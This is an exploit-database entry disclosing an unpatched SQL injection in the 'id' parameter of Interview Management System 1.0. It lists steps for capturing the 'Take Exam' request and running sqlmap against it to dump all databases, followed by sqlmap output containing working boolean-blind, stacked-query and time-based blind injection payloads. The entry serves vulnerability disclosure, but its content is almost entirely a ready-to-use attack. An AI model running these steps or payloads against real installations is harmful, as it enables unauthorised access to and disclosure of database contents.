Interview Management System 1.0 - 'id' SQL Injection

2020-12-19
ID: 103773
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-10
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS

Step 1. Login to the application with any verified user credentials

Step 2. Click on View Candidates page and select take exam. If there is no
candidate, click on "Add New Candidate" page, fill details and add new
candidate.

Step 3. Click on "Take Exam" and capture the request in burpsuite.

Step 4. Save request and run sqlmap on request file using command " sqlmap
-r request -p id --time-sec=5 --dbs ".

Step 5. This will inject successfully and you will have an information
disclosure of all databases contents.

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980
UNION SELECT 3372) END))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW)
---
1-4-2 (www02)